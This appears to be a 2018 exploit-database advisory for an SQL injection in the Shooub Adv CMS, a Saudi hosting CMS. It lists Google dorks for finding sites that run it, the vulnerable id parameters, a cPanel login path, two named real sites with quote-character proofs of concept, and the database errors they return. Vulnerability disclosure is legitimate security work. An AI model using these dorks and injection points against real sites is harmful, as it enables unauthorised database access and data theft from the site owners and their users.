#################################################################################################
# Exploit Title : Sadv.Com.Sa Hosting شعوب المتقدمة Shooub Adv CMS V.1 SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/11/2018
# Vendor Homepage : sadv.com.sa ~ sadv.sa ~ adv.shooub.co
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''© جميع الحقوق محفوظة لشركة شعوب المتقدمة'' site:sa
intext:''Copyright © 2014 - Powered By SHOOUB CMS V.1'' site:sa
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Admin CPanel Login Path :
TARGETDOMAIN:2083
sadvuk01.sadv.com.sa:2083
#################################################################################################
# SQL Injection Exploit :
/Service.php?id=[SQL Injection]
/Project.php?id=[SQL Injection]
#################################################################################################
# Example Vulnerable Site =>
[+] kandelsa.com/Project.php?id=5%27 => [ Proof of Concept ] => archive.is/TV66q
[+] azdan.com.sa/Service.php?id=4%27=> [ Proof of Concept ] => archive.is/rUJBk
#################################################################################################
# SQL Database Error :
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/kandelsa/public_html/Project.php on line 85
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/azdansadv/public_html/E/Project.php on line 83
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################